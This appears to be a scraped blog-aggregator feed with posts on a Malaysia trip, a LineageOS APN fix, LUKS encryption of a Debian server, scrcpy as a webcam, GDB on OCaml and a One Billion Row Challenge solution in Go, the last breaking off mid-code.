So, I booked another hostel by the name of The Manor by Mingle, 1 km from my previous hostel, for MYR 99.34 (1,800 INR) for two nights, including the MYR 10 tourism fee per night. This was expensive compared to the other hostels I stayed in on this trip, probably due to the weekend. It had a swimming pool, which was of no use to me. Further, it also had laundry services, which I used. The charges were MYR 5 for washing and MYR 3 for the dryer.\nAfter checking in and leaving my luggage in my room, Fletcher and I went to the nearby shopping mall Berjaya Times Square, which was decorated for the upcoming Chinese New Year on 8th Feb, with prices greatly discounted for the occasion. After roaming around and a bit of shopping, we went back to our respective hostels to rest. At night, we went to Bukit Bintang, which is known for its nightlife and called the entertainment hub of the city.\n\n      \nBerjaya Times Square dipped in Chinese New Year celebrations.\nDay 4: Genting Highlands\nOn the 4th of Feb, I took a solo day trip to Genting Highlands, a hill station located on the outskirts of Kuala Lumpur. To reach there, I took a bus from KL Sentral (return ticket was MYR 20), which dropped me at the bus terminal below Awana Skyway cable car station. I took a cable car to reach Genting Highlands from there (MYR 18 for a return ticket), which passes through mist and offers stunning views. I roamed around and did some shopping, buying three T-shirts for myself. I also sampled Paneer Makhani with naan for MYR 41.8 at a restaurant.\n\n      \nViews from cable car.\n\n      \nViews from cable car.\n\n      \nI ordered Paneer Makhani with naan at a restaurant in Genting Highlands.\nThere was not much for me to do here, as the place is popular for being the only legal place to gamble in Malaysia - nothing of interest to me. Although the cable car ride had scenic views, I don’t think Genting Highlands was worth visiting. Sure, it’s a good place for a day trip from KL, but I had more time and should have instead gone to some other place like the Cameron Highlands. Genting Highlands is for people staying for a couple of days in KL who don’t want to visit far-off places. I think my decision to visit Genting Highlands was a case of falling into the trap of herd mentality: when I went to the bus counter a couple of days earlier, I saw a big queue for Genting Highlands, and that became the basis of my decision.\nI took the return cable car to reach the bus terminal, from where I took the bus for KL Sentral. Then I went to meet Fletcher, who was leaving for Bangkok. We later met in Pattaya, Thailand, after a few days, which will be covered in the next post.\nDays 5 and 6\nSince the hostel Manor by Mingle was a bit expensive, I booked a cheaper hostel for the last two nights in Bukit Bintang. I didn’t really do much in the last two days. I roamed around and added some places to OpenStreetMap. As I was living in Bukit Bintang, I bought some souvenirs from there and tried a Middle Eastern dessert named Kunafa, which was yummy. 
I also discovered a shop named ‘I Love KL Gifts’, which had souvenirs at great prices.\n\n      \nKunafa, a Middle Eastern dessert I sampled in Bukit Bintang.\n7th Feb: Malaysia Airlines to Bangkok\nOn the 7th of Feb, I took a Malaysia Airlines flight to Bangkok, which was scheduled to depart from KL Airport at 12:15 hours, but the departure was delayed by 2 hours; we landed in Bangkok at around 15:00 hours local time (1 hour 30 minutes ahead of Indian time). More details will be covered in the Thailand post.\n\n      \nMalaysia Airlines jet standing at KL Airport.\nExpenses\nCategory | Amount (INR)\nFood + Accommodation + Travel in Malaysia | 10,000\nDelhi to Kuala Lumpur flight | 13,000\nKuala Lumpur to Bangkok flight | 10,000\nBangkok to Delhi flight | 12,000\nLearning for future trips\nMalaysia has numerous places worthy of a visit: the Cameron Highlands (for its beautiful tea gardens), Malacca (due to its unique history and culture), Langkawi (for its white sand beaches) – and this list does not include the scenic spots from the part of Malaysia on the island of Borneo. However, I limited my trip to Kuala Lumpur and nearby places, which was a bad idea. After the trip, I realized that my mobility was reduced because I was carrying a trolley bag. Additionally, my trip to the Genting Highlands could have been replaced by a better alternative.\nIf you are like me and avoid taking a lot of taxis, preferring to walk or use public transport whenever possible, I highly advise you to cut back on luggage. Another instance where I could have benefited from this was with the airline ticket from Kuala Lumpur to Bangkok, which would have been much cheaper if I had carried less luggage (the tickets were 3,000-4,000 INR), compared to the ticket I bought for 10,000 INR.",[],{"slug":1043,"title":1044,"link":1045,"pubDate":1046,"contentSnippet":1047,"tags":1048,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"fix-internet-on-lineage-os","Fixing Mobile Data issue on Lineage OS","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Ffix-internet-on-lineage-os\u002F","Fri, 01 Mar 2024 14:34:08 +0530","I have used LineageOS on many Android devices and have faced internet connectivity issues with mobile data. Mobile data never worked properly on my Xiaomi Mi A2 on LineageOS, nor on my current phone, a OnePlus 9 Pro 5G. A few days ago, I met contrapunctus, who has the same phone model with LineageOS. He fixed this issue by comparing the settings of my phone with his.\nIn case you are suffering from this issue, the following steps fixed it for me:\nNavigate to Settings -> Network Settings -> Your SIM settings -> Access Point Names.\nClick on the ‘+’ symbol to add a new access point.\nIn the Name section, you can input any name (e.g., test).\nIn the APN section, enter www and save the settings.\nCheck the screenshot below.\n\nAPN settings screenshot. Notice the circled entries.\n\nOnce you have added this new APN, make sure to select it from the list of available APNs. Following this configuration change, the issue was fixed. 
I hope this works for you :)",[],{"slug":1050,"title":1051,"link":1052,"pubDate":1053,"contentSnippet":1054,"tags":1055,"maintainerName":27,"maintainerUsername":28,"maintainerPhoto":29,"feedUrl":30},"07-encrypt-ext4-debian-install-html","How to encrypt an existing Debian install (LegacyBIOS)","https:\u002F\u002Faryak.me\u002Fblog\u002F07-encrypt-ext4-debian-install.html","Thu, 29 Feb 2024 12:39:45 +0000","Recently, I decided to encrypt the VPSes of Project Segfault, as it coincided with the\nmigration of one of our servers, our EU node.\nHowever, while moving our US node, we faced a few problems, in that\nI didn’t want to wipe the disk, nor did I want to do some jank\nstuff like reinstalling Debian and then replacing the files.\nTherefore, my only solution came down to creating a new encrypted\npartition, copying the entire directory tree of the old partition to the\nnew one via rsync, and then making grub and co. point to the new\nstuff.\nSo, in order to do this, you first need to shrink your existing\npartition so you can create the new one, which I did using GParted on\nthe GParted LiveCD.\nPast that, you have to create the new primary partition in the empty\nspace created, which I did via cfdisk, since GParted requires you to\nformat while creating a partition (from what I could see), and it\ndoesn’t support creating LUKS partitions.\nAdditionally, since you can’t use the “good” PBKDF, argon2i(d) (which\nis more secure and gives faster speeds) with the current version of grub\navailable on Debian 12, you have to move \u002Fboot to a separate unencrypted\npartition. This can be done by merely creating a new ~512 MiB ext2\nprimary partition via GParted.\nPast this, I had to create the LUKS stuff. To do so, I ran the\nfollowing commands:\n# Format partition as LUKS encrypted\ncryptsetup luksFormat --type luks2 --pbkdf argon2i \u002Fdev\u002FDEVICE\n# Open partition, and map it to \u002Fdev\u002Fmapper\u002Fcrypt\ncryptsetup luksOpen \u002Fdev\u002FDEVICE crypt\n# Overwrite the entire device with 0s, just to be a bit more secure\ndd if=\u002Fdev\u002Fzero of=\u002Fdev\u002Fmapper\u002Fcrypt status=progress bs=4096\n# Create ext4 partition on the mapped device\nmkfs.ext4 \u002Fdev\u002Fmapper\u002Fcrypt\n\nThen, to copy the content to the new partition, I used the following\ncommands:\nmkdir -p \u002Fmnt\u002F{old,new}\nmount \u002Fdev\u002FOLD_DEVICE \u002Fmnt\u002Fold\nmount \u002Fdev\u002Fmapper\u002Fcrypt \u002Fmnt\u002Fnew\nmkdir -p \u002Fmnt\u002Fnew\u002Fboot\nmount \u002Fdev\u002FBOOT_DEVICE \u002Fmnt\u002Fnew\u002Fboot\nrsync -av \u002Fmnt\u002Fold\u002F* \u002Fmnt\u002Fnew\n\nAfter all the data was copied, I needed to enter a chroot environment in\norder to configure a few more things. 
This is done through the following\ncommands:\nmount -t sysfs \u002Fsys \u002Fmnt\u002Fnew\u002Fsys\u002F\nmount -t proc \u002Fproc \u002Fmnt\u002Fnew\u002Fproc\u002F\nmount --rbind \u002Fdev \u002Fmnt\u002Fnew\u002Fdev\u002F\nchroot \u002Fmnt\u002Fnew\n\nInside the chroot environment, you need to first install some\ncryptsetup-related packages, and then update the crypttab and fstab files:\napt install cryptsetup cryptsetup-initramfs\n\n\u002Fetc\u002Fcrypttab (the file which tells the system what encrypted\npartitions to mount):\ncrypt   UUID=UUID_OF_PARTITION_FROM_BLKID   none    luks,discard\n\u002Fetc\u002Ffstab:\n\u002Fdev\u002Fmapper\u002Fcrypt   \u002F   ext4    rw  0   1\n\u002Fdev\u002FBOOT_PARTITION \u002Fboot   ext2    rw  0   1\nPast this, you need to reinstall grub:\ngrub-install \u002Fdev\u002FDISK # for legacy BIOS, note this is the disk not the partition (i.e. \u002Fdev\u002Fvda, not \u002Fdev\u002Fvda1)\nupdate-grub\n\nAnd that should be it: once you reboot, you should see a\npassword prompt, past which you can boot into your newly encrypted\nsystem!\nPS: don’t forget to remove the old partition :D",[1056],"2024\u002F02\u002F29\u002F4",{"slug":1058,"title":1059,"link":1060,"pubDate":1061,"contentSnippet":1062,"tags":1063,"maintainerName":27,"maintainerUsername":28,"maintainerPhoto":29,"feedUrl":30},"06-phone-webcam-scrcpy-html","Using my phone as a webcam with just scrcpy and ADB","https:\u002F\u002Faryak.me\u002Fblog\u002F06-phone-webcam-scrcpy.html","Sat, 27 Jan 2024 12:39:45 +0000","Recently, we decided to start streaming FOSS United Mumbai events to our PeerTube instance, and hence we needed a\ncamera.\nSince we couldn’t procure a good camera that could capture text from\nthe projector well, I started experimenting with other alternatives.\nThe first thing I tried was a generic IP-camera-based solution,\nwhich of course came with the latencies involved in network-based\nstuff and hence wasn’t suitable for this purpose.\nThen, I tried droidcam, which uses ADB, but again, it had a paywall\nfor anything over 480p.\nPast this, my jugaad solution was to use scrcpy via USB ADB,\nopen the normal camera app and then just capture part of the window with\nthe content, but that came with the issue of only being able to use a 4:3\naspect ratio, and potentially worse quality since liveview is rarely as\ngood as actuals.\nLater, I discovered that scrcpy can natively capture the phone camera\nsince Android 12+ and Scrcpy 2.x+.\nThis came with the first problem: Debian testing is\nstill stuck on scrcpy 1.x!\nNote to self: maybe I should try porting a 2.x to Debian :D\nAs outlined in the docs,\nscrcpy can capture both front and back cameras, at all supported\nresolutions, and even the audio from the phone’s mic (which is useful\nconsidering how shitty the mics are on modern laptops these days).\nSo in the end, I ended up with this command:\n\u002Fusr\u002Flocal\u002Fbin\u002Fscrcpy --video-source=camera --camera-id=0 --camera-size=3264x1836\n\nNow, at this point, I just needed to run OBS under Xwayland, add it\nas an Xcomposite video capture, and start streaming!\nBut then, if you want to use it as a webcam, you just have to install\nv4l2loopback (and run modprobe v4l2loopback), and then click “Start\nVirtual Camera” instead of Start Streaming.\nDo note though, you might have to change the output type to scene under\nthe settings section right next to the “Start Virtual Camera” button.\nBut that’s about it. 
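To recap, the whole setup boils down to just a couple of commands (a sketch of my setup; the camera ID and resolution here are specific to my phone, so adjust them for yours):\n# expose a virtual camera device that OBS can output to\nsudo modprobe v4l2loopback\n# mirror the phone’s back camera over USB ADB\n\u002Fusr\u002Flocal\u002Fbin\u002Fscrcpy --video-source=camera --camera-id=0 --camera-size=3264x1836\n# then, in OBS: add an Xcomposite capture of the scrcpy window and click “Start Virtual Camera”\n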
This is still a bit jank, considering you need\nscrcpy and OBS both running in the background, but it generally does the\njob pretty well, and a good phone’s webcam is miles better than any\nother mid-range web-cam you can get.",[1064],"2024\u002F01\u002F27\u002F6",{"slug":1066,"title":1067,"link":1068,"pubDate":1069,"contentSnippet":1070,"tags":1071,"maintainerName":349,"maintainerUsername":350,"maintainerPhoto":351,"feedUrl":352},"gdb-ocaml","Getting Started with GDB on OCaml","https:\u002F\u002Fkcsrk.info\u002Focaml\u002Fgdb\u002F2024\u002F01\u002F20\u002Fgdb-ocaml\u002F","2024-01-20T15:16:00.000Z","A number of folks who regularly use OCaml were surprised to learn that you can\nreasonably debug OCaml programs using gdb. The aim of the post is to show the\nfirst steps in using gdb on OCaml programs.\nLet’s consider the following program:\n\n(* fib.ml *)\nlet rec fib n = \n  if n = 0 then 0\n  else if n = 1 then 1\n  else fib (n-1) + fib (n-2)\n\nlet main () = \n  let r = fib 20 in \n  Printf.printf \"fib(20) = %d\" r\n\nlet _ = main ()\n\n\nLet’s compile this program. I’m using OCaml version 5.1.1.\n\n$ ocamlopt --version\n5.1.1\n$ ocamlopt -g -o fib.exe fib.ml\n$ $ .\u002Ffib.exe 20\nfib(20) = 6765\n\n\nAs you can see, the program prints the 20th Fibonacci number. Let’s examine this\nprogram under gdb. Before we venture any further, I highly recommend watching\nthis 15-minute video\nthat shows a number of gdb tricks. Let’s start a gdb session.\n\n$ gdb .\u002Ffib.exe\n\n\nSetting breakpoints\nLet’s set a break point at the fib function. When OCaml functions are\ncompiled, their names are mangled. OCaml 5.1.1 uses the following mangling\nscheme caml\u003CMODULE_NAME>.\u003CFUNCTION_NAME>_\u003CNNN> where NNN is a randomly\ngenerated number. For the fib function, since it is under the file fib.ml,\nthe module name is Fib. Since we can’t guess NNN, we use tab completion to\nhelp identify the function.\n\n(gdb) break camlFib.fib_ #press tab\n(gdb) break camlFib.fib_269 #269 happens to be the randomly generated number\n                            #on my machine.\n(gdb) Breakpoint 1 at 0x3d160: file fib.ml, line 1.\n\n\nYou can also set a breakpoint using gdb’s file name and line number combination.\nLet’s set another break point at the main function, which is at line number 6\nin fib.ml.\n\n(gdb) break fib.ml:6\nBreakpoint 2 at 0x3d1d0: file fib.ml, line 6.\n\n\nLet’s run the program.\n\n(gdb) r\nStarting program: \u002Fhome\u002Fkc\u002Ftemp\u002Ffib.exe \n[Thread debugging using libthread_db enabled]\nUsing host libthread_db library \"\u002Flib\u002Fx86_64-linux-gnu\u002Flibthread_db.so.1\".\n\nBreakpoint 2, camlFib.main_271 () at fib.ml:6\n6       let main () =\n\n\nThe program execution starts in the gdb session and we stop at the breakpoint\ninstalled at main. gdb has a nice TUI mode for stepping through the file. This\ncan be activated with ctrl+x+a key combination, which should show a screen\nsimilar to the following.\n  \nNotice that we can see both the breakpoints installed in this file. The current\nline is highlighted.\nExamining the stack\nYou can step through the OCaml program with gdb commands n and s. 
After a\nfew ns, you can examine the backtrace using the bt command.\n\n(gdb) bt\n#0  camlFib.fib_269 () at fib.ml:1\n#1  0x00005555555911a1 in camlFib.fib_269 () at fib.ml:4\n#2  0x00005555555911a1 in camlFib.fib_269 () at fib.ml:4\n#3  0x00005555555911a1 in camlFib.fib_269 () at fib.ml:4\n#4  0x00005555555911a1 in camlFib.fib_269 () at fib.ml:4\n#5  0x00005555555911f1 in camlFib.main_271 () at fib.ml:7\n#6  0x000055555559129a in camlFib.entry () at fib.ml:10\n#7  0x000055555558eb0b in caml_program ()\n#8  \u003Csignal handler called>\n#9  0x00005555555dd306 in caml_startup_common (pooling=\u003Coptimised out>, argv=0x7fffffffe008) at runtime\u002Fstartup_nat.c:132\n#10 caml_startup_common (argv=0x7fffffffe008, pooling=\u003Coptimised out>) at runtime\u002Fstartup_nat.c:88\n#11 0x00005555555dd37f in caml_startup_exn (argv=\u003Coptimised out>) at runtime\u002Fstartup_nat.c:139\n#12 caml_startup (argv=\u003Coptimised out>) at runtime\u002Fstartup_nat.c:144\n#13 caml_main (argv=\u003Coptimised out>) at runtime\u002Fstartup_nat.c:151\n#14 0x000055555558e8f2 in main (argc=\u003Coptimised out>, argv=\u003Coptimised out>) at runtime\u002Fmain.c:37\n\n\nAs you can see the backtrace includes the recursive calls to the fib function,\nthe main function in fib.ml, followed by a number of functions from the\nOCaml runtime, and finally ending at the main function.\nNote that \u003Csignal handler called> is a misnomer and is not an actual signal\nhandler. OCaml 5 supports effect\nhandlers with the help of runtime\nmanaged stack segments for the OCaml stack. There is also a single C stack that\nis used by all the fibers that run on a\ndomain, our unit of parallelism.\nThe \u003Csignal handler called> represents a frame where the control switches\nbetween the C stack (managed by the OS) and the OCaml stack (managed by the\nOCaml runtime). The OCaml runtime marks these frames where the stack are split\nas signal handler frames so that gdb doesn’t complain about stack corruption;\ngdb expects stacks to grow down, which may not be true if the stack segments are\nin different parts of the memory address space. You will also find such \u003Csignal\nhandler called> frames between OCaml fibers (when using effect handlers) and\nwhen OCaml calls into the (C) runtime. You can find more details about the stack\nlayout in the PLDI 2021 paper on OCaml effect\nhandlers.\nExamining values\nThere isn’t good support for examining OCaml values in gdb unlike C. That said,\ngiven the uniform value representation of\nOCaml, with a bit of\ninformation about the OCaml calling convention, we can start to examine the\nvalues. It is useful to note that OCaml 5.1.1 on x86 passes the first 10\narguments in\nregisters.\nIn particular, the first argument is in the register rax. So the argument to\nthe fib function should be in the rax register. We also know that the\nargument to fib is an integer. OCaml uses 63-bit tagged integers (on 64-bit\nmachines) with the least-significant bit is 1. Given a machine word or a\nregister holding an OCaml integer, the integer value is obtained by right\nshifting the value by 1.\nPutting it all together, we can get the argument value of fib at the\nbreakpoint at the entry to fib as follows:\n\n(gdb) p $rax >> 1\n$2 = 12\n\n\nGiven that we’ve already stepped through the program several times, the current\ncall for me corresponds to fib(12). 
Let’s see what’s the next argument by\ncontinuing the program until we hit the breakpoint again.\n\n(gdb) c\nContinuing.\n\nBreakpoint 1, camlFib.fib_269 () at fib.ml:1\n(gdb) p $rax >> 1\n$3 = 10\n\n\nObserve that this corresponds to the recursive call fib(10), which must mean\nthat the RHS recursive call is the one being invoked. Note that the evaluation\norder of arguments in OCaml is unspecified. The 5.1.1 implementation does\nright-to-left evaluation of arguments (to the (+) function in this case),\nwhich can be confirmed with the following program:\n\n$ cat eval_order.ml\nlet _ =\n  (print_endline \"hello\"; 0) + (print_endline \"world\"; 1)\n$ ocamlopt.opt -g -o eval_order.exe eval_order.ml\n$ .\u002Feval_order.exe\nworld\nhello\n\n\nAdvanced printing\nAs you can observe, examining values this way is cumbersome. The OCaml compiler\ndistribution has some rudimentary scripts to make it easier to examine OCaml\nvalues in gdb. Note that this was developed by OCaml maintainers to develop the\ncompiler, and was not designed to serve end user needs. That said, let’s dive\nin.\nSince we are on OCaml 5.1.1, let’s check out the source code for 5.1.1\nfirst.\n\n# I'm in ~\u002Frepos directory on my machine *)\n$ git clone https:\u002F\u002Fgithub.com\u002Focaml\u002Focaml --branch 5.1.1\n\n\nLet’s start a new gdb session, load the gdb script and get to the desired\nbreakpoint.\n\n$ gdb .\u002Ffib.exe\n(gdb) source ~\u002Frepos\u002Focaml\u002Ftools\u002Fgdb_ocamlrun.py\n(gdb) break fib.ml:1\nBreakpoint 1 at 0x3d160: file fib.ml, line 1.\n(gdb) r\nStarting program: \u002Fhome\u002Fkc\u002Ftemp\u002Ffib.exe \n[Thread debugging using libthread_db enabled]\nUsing host libthread_db library \"\u002Flib\u002Fx86_64-linux-gnu\u002Flibthread_db.so.1\".\n\nBreakpoint 1, camlFib.fib_269 () at fib.ml:1\n1       let rec fib n =\n\n\nAs earlier, the first argument is in rax register. We can examine the value\nnow with the help of the script.\n\n(gdb) p (value)$rax\n$1 = I(20)\n\n\nvalue is the type of OCaml values defined in OCaml runtime. The script\ntools\u002Fgdb_ocamlrun.py installs a pretty printer for the values of type\nvalue. Here, it prints that the argument is the integer 20.\nWe can also print other kinds of OCaml values. In order to illustrate this,\nconsider the following program:\n\n$ cat test_blocks.ml\n(* test_blocks.ml *)\n\ntype t = {s : string; i : int}\n\nlet main a b =\n  print_endline \"Hello, world!\";\n  print_endline a;\n  print_endline b.s\n\nlet _ = main \"foo\" {s = \"bar\"; i = 42}\n\n\nLet’s compile, start a gdb session and break at the main function.\n\n$ ocamlopt -g -o test_blocks.exe test_blocks.ml                                                                                                               \n$ gdb .\u002Ftest_blocks.exe\n(gdb) break camlTest_blocks.main_272 \nBreakpoint 1 at 0x16ed0: file test_blocks.ml, line 5.\n(gdb) r\nStarting program: \u002Fhome\u002Fkc\u002Ftemp\u002Ftest_blocks.exe \n[Thread debugging using libthread_db enabled]\nUsing host libthread_db library \"\u002Flib\u002Fx86_64-linux-gnu\u002Flibthread_db.so.1\".\n\nBreakpoint 1, camlTest_blocks.main_272 () at test_blocks.ml:5\n5       let main a b =\n(gdb) source ~\u002Frepos\u002Focaml\u002Ftools\u002Fgdb_ocamlrun.py \n\n\nLet’s examine the two arguments to main.\n\n(gdb) p (value)$rax\n$1 = String_tag(\"foo\", NOT_MARKABLE)\n\n\nThe first argument is a string “foo”. 
NOT_MARKABLE is one of the GC colours\nused by OCaml 5, and represents objects that are not traced by the\nmark-and-sweep (major) GC. The string happens to be allocated in the data\nsection of the address space, and\nis not traced by the GC.\n\n(gdb) info symbol $rax\ncamlTest_blocks.4 in section .data of \u002Fhome\u002Fkc\u002Ftemp\u002Ftest_blocks.exe\n\n\nLet’s examine the second argument.\n\n(gdb) p (value)$rbx\n$2 = Block(0, wosize=2, NOT_MARKABLE)\n\n\nThe second argument, which is passed in the register rbx, is a record with two\nfields. Hence, the pretty printer says that it is a block with 2 fields.  We can\nprint both values using gdb’s support for printing a range of values.\n\n(gdb) p *(value*)$rbx@2                                                                 \n$3 = {String_tag(\"bar\", NOT_MARKABLE), I(42)}\n\n\nWe cast rbx to an array of values and print the first two fields in the\narray. This shows that the fields are the string “bar” and integer 42.\nMore for later\nThere is a lot more to be said about debugging OCaml programs using gdb. We\nshall see them in subsequent posts if there is interest.",[],{"slug":1073,"title":1074,"link":1075,"pubDate":1076,"contentSnippet":1077,"tags":1078,"maintainerName":94,"maintainerUsername":95,"maintainerPhoto":96,"feedUrl":97},"1brc","One Billion Row Challenge in Go","https:\u002F\u002Fmrkaran.dev\u002Fposts\u002F1brc\u002F","2024-01-10T00:00:00.000Z","Earlier this week, I had stumbled upon 1brc, which presents a fun task: loading a huge text file (1 billion lines) in Java as quickly as possible.\nThe One Billion Row Challenge (1BRC) is a fun exploration of how far modern Java can be pushed for aggregating one billion rows from a text file. Utilize all your virtual threads, leverage SIMD, optimize your GC, or employ any other technique to create the fastest implementation for this task!\nThe challenge is mainly about Java, but I thought to do the same in my preferred language: Go. This post is about how I did several iterations to my Go program to reduce the time and discuss the main techniques used in each iteration to make it faster.\nI was able to create a solution which takes ~20s to read, parse and calculate stats for 1bn lines on my Apple M2 (10 vCPU, 32GB RAM).\nThere are some insane solutions that people have come up with, be sure to check out GitHub Discussions to go through them!\nPrerequisites#\nTo generate the text file for these measurements, follow the steps outlined here.\nAfter running the commands, I have a measurements.txt on my file system:\nExample output after running the commands:\n➜  1brc-go git:(main) du -sh measurements.txt\n 13G\tmeasurements.txt\n➜  1brc-go git:(main) tail measurements.txt\nMek'ele;13.3\nKampala;50.8\nDikson;-3.7\nDodoma;20.3\nSan Diego;7.1\nChihuahua;20.3\nNgaoundéré;24.2\nToronto;12.7\nWrocław;12.6\nSingapore;14.4\nUltra minimalistic example of reading a file#\nLet’s take a look at a basic Go code to read and parse the above file. 
We’ll also calculate stats on the fly.\npackage main\n\nimport (\n\t\"bufio\"\n\t\"fmt\"\n\t\"os\"\n\t\"sort\"\n\t\"strconv\"\n\t\"strings\"\n)\n\ntype Measurement struct {\n\tStation string\n\tTemp    float64\n}\n\ntype Stats struct {\n\tMin, Mean, Max float64\n}\n\nfunc main() {\n\t\u002F\u002F Open the file.\n\tfile, err := os.Open(\"measurements.txt\")\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tdefer file.Close()\n\n\t\u002F\u002F Map to hold the temperatures for each station.\n\tstationTemps := make(map[string][]float64)\n\n\tscanner := bufio.NewScanner(file)\n\tfor scanner.Scan() {\n\t\t\u002F\u002F Parse each line into a Measurement struct.\n\t\tparts := strings.Split(scanner.Text(), \";\")\n\t\ttemp, _ := strconv.ParseFloat(parts[1], 64)\n\t\tstationTemps[parts[0]] = append(stationTemps[parts[0]], temp)\n\t}\n\n\t\u002F\u002F Calculate min, mean, and max for each station.\n\tresults := make(map[string]Stats)\n\tfor station, temps := range stationTemps {\n\t\tmin, max, sum := temps[0], temps[0], 0.0\n\t\tfor _, t := range temps {\n\t\t\tif t \u003C min {\n\t\t\t\tmin = t\n\t\t\t}\n\t\t\tif t > max {\n\t\t\t\tmax = t\n\t\t\t}\n\t\t\tsum += t\n\t\t}\n\t\tmean := sum \u002F float64(len(temps))\n\t\tresults[station] = Stats{Min: min, Mean: mean, Max: max}\n\t}\n\n\t\u002F\u002F Sort the stations and format the output.\n\tvar stations []string\n\tfor station := range results {\n\t\tstations = append(stations, station)\n\t}\n\tsort.Strings(stations)\n\n\tfmt.Print(\"{\")\n\tfor i, station := range stations {\n\t\tr := results[station]\n\t\tfmt.Printf(\"%s=%.1f\u002F%.1f\u002F%.1f\", station, r.Min, r.Mean, r.Max)\n\t\tif i \u003C len(stations)-1 {\n\t\t\tfmt.Print(\", \")\n\t\t}\n\t}\n\tfmt.Println(\"}\")\n}\nOn running the above program, we get the following output:\n{Chihuahua=20.3\u002F20.3\u002F20.3, Dikson=-3.7\u002F-3.7\u002F-3.7, Dodoma=20.3\u002F20.3\u002F20.3, Kampala=50.8\u002F50.8\u002F50.8, Mek'ele=13.3\u002F13.3\u002F13.3, Ngaoundéré=24.2\u002F24.2\u002F24.2, San Diego=7.1\u002F7.1\u002F7.1, Singapore=14.4\u002F14.4\u002F14.4, Toronto=12.7\u002F12.7\u002F12.7, Wrocław=12.6\u002F12.6\u002F12.6}\nThis approach works well for small, simple files. However, there are certain restrictions:\nIt reads the file line by line using a scanner. Reading and processing a billion rows is time-consuming.\nEach operation, even if small, adds up when repeated a billion times. This includes string splitting, type conversion, error checking, and appending to a slice.\nAdditionally, we need to consider the potential of hitting the max Disk IOPS limit if we perform too many file operations per second.\nBefore we proceed to optimize this further, let’s establish a baseline performance of 100 million lines first:\n$ wc -l measurements.txt\n  100000000 measurements.txt\n$ time go run main.go\n  go run main.go  18.44s user 0.83s system 100% cpu 19.135 total\nBaseline: It takes approximately 19s to read and calculate stats from 100 mn lines.\nThere’s a lot of room to optimize it further, let’s go through them one by one.\nIteration 1: Producer-Consumer Pattern#\nThe concept involves reading multiple lines simultaneously in the producer Goroutine and then dispatching these batches to worker Goroutines. We can establish a worker pool to implement a producer-consumer pattern. Producers read lines from the file and send them to a channel. 
Consumers retrieve lines from the channel, parse the data, and calculate the minimum, mean, and maximum temperatures for each station.\nfunc main() {\n\tnumWorkers := runtime.NumCPU()\n\truntime.GOMAXPROCS(numWorkers)\n\n\tlinesChan := make(chan string, 1000000)\n\tresultsChan := make(chan map[string]Stats, numWorkers)\n\n\t\u002F\u002F Start worker goroutines\n\tvar wg sync.WaitGroup\n\tfor i := 0; i \u003C numWorkers; i++ {\n\t\twg.Add(1)\n\t\tgo worker(linesChan, resultsChan, &wg)\n\t}\n\n\t\u002F\u002F Read the file and send lines to the workers\n\tgo func() {\n\t\tfile, err := os.Open(measurementsFile)\n\t\tif err != nil {\n\t\t\tpanic(err)\n\t\t}\n\t\tdefer file.Close()\n\n\t\tscanner := bufio.NewScanner(file)\n\t\tfor scanner.Scan() {\n\t\t\tlinesChan \u003C- scanner.Text()\n\t\t}\n\t\tclose(linesChan)\n\t}()\n\n\t\u002F\u002F Collect results from workers\n\twg.Wait()\n\tclose(resultsChan)\n\n\t\u002F\u002F Aggregate results\n\tfinalResults := make(map[string]Stats)\n\tfor workerResult := range resultsChan {\n\t\tfor station, stats := range workerResult {\n\t\t\tfinalStats := finalResults[station]\n\t\t\tfinalStats.Min = min(finalStats.Min, stats.Min)\n\t\t\tfinalStats.Max = max(finalStats.Max, stats.Max)\n\t\t\tfinalStats.Mean = (finalStats.Mean*float64(finalStats.Count) + stats.Mean*float64(stats.Count)) \u002F float64(finalStats.Count+stats.Count)\n\t\t\tfinalStats.Count += stats.Count\n\t\t\tfinalResults[station] = finalStats\n\t\t}\n\t}\n\n\t\u002F\u002F Print results\n\tprintStats(finalResults)\n}\n\nfunc worker(linesChan \u003C-chan string, resultsChan chan\u003C- map[string]Stats, wg *sync.WaitGroup) {\n\tdefer wg.Done()\n\n\tstationStats := make(map[string]Stats)\n\tfor line := range linesChan {\n\t\tparts := strings.Split(line, \";\")\n\t\ttemp, err := strconv.ParseFloat(parts[1], 64)\n\t\tif err != nil {\n\t\t\tcontinue\n\t\t}\n\n\t\tstats := stationStats[parts[0]]\n\t\tstats.Count++\n\t\tstats.Min = min(stats.Min, temp)\n\t\tstats.Max = max(stats.Max, temp)\n\t\tstats.Mean += (temp - stats.Mean) \u002F float64(stats.Count)\n\t\tstationStats[parts[0]] = stats\n\t}\n\n\tresultsChan \u003C- stationStats\n}\n\nfunc min(a, b float64) float64 {\n\tif a == 0 || a > b {\n\t\treturn b\n\t}\n\treturn a\n}\n\nfunc max(a, b float64) float64 {\n\tif a \u003C b {\n\t\treturn b\n\t}\n\treturn a\n}\n\nfunc printStats(statsMap map[string]Stats) {\n\tvar stations []string\n\tfor station := range statsMap {\n\t\tstations = append(stations, station)\n\t}\n\tsort.Strings(stations)\n\n\tfmt.Print(\"{\")\n\tfor i, station := range stations {\n\t\tstats := statsMap[station]\n\t\tfmt.Printf(\"%s=%.1f\u002F%.1f\u002F%.1f\", station, stats.Min, stats.Mean, stats.Max)\n\t\tif i \u003C len(stations)-1 {\n\t\t\tfmt.Print(\", \")\n\t\t}\n\t}\n\tfmt.Println(\"}\")\n}\nResults#\nThe concurrent version, unexpectedly, resulted in almost a 3x decrease in performance.\ngo run main.go  84.15s user 101.34s system 342% cpu 54.225 total\nWhere did we go wrong? This is a classic case where the overhead of concurrency mechanisms outweighs their benefits. In our current implementation, each line is sent to the channel individually, which is likely less efficient than batching lines for processing. This means that for a file with a large number of lines, there will be an equally large number of channel send operations. 
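To get a feel for how much those per-item sends cost, here is a
minimal, self-contained benchmark sketch (the names and sizes are
mine, not from the actual solution); run it with go test -bench=. :

package chanbench

import \"testing\"

const items = 1 \u003C\u003C 16

\u002F\u002F drain consumes every batch from ch and signals done.
func drain(ch \u003C-chan []int, done chan\u003C- struct{}) {
	for range ch {
	}
	close(done)
}

func BenchmarkSendPerItem(b *testing.B) {
	for i := 0; i \u003C b.N; i++ {
		ch := make(chan int, 1024)
		done := make(chan struct{})
		go func() {
			for range ch {
			}
			close(done)
		}()
		for j := 0; j \u003C items; j++ {
			ch \u003C- j \u002F\u002F one channel operation per item
		}
		close(ch)
		\u003C-done
	}
}

func BenchmarkSendBatched(b *testing.B) {
	const batchSize = 1024
	for i := 0; i \u003C b.N; i++ {
		ch := make(chan []int, 16)
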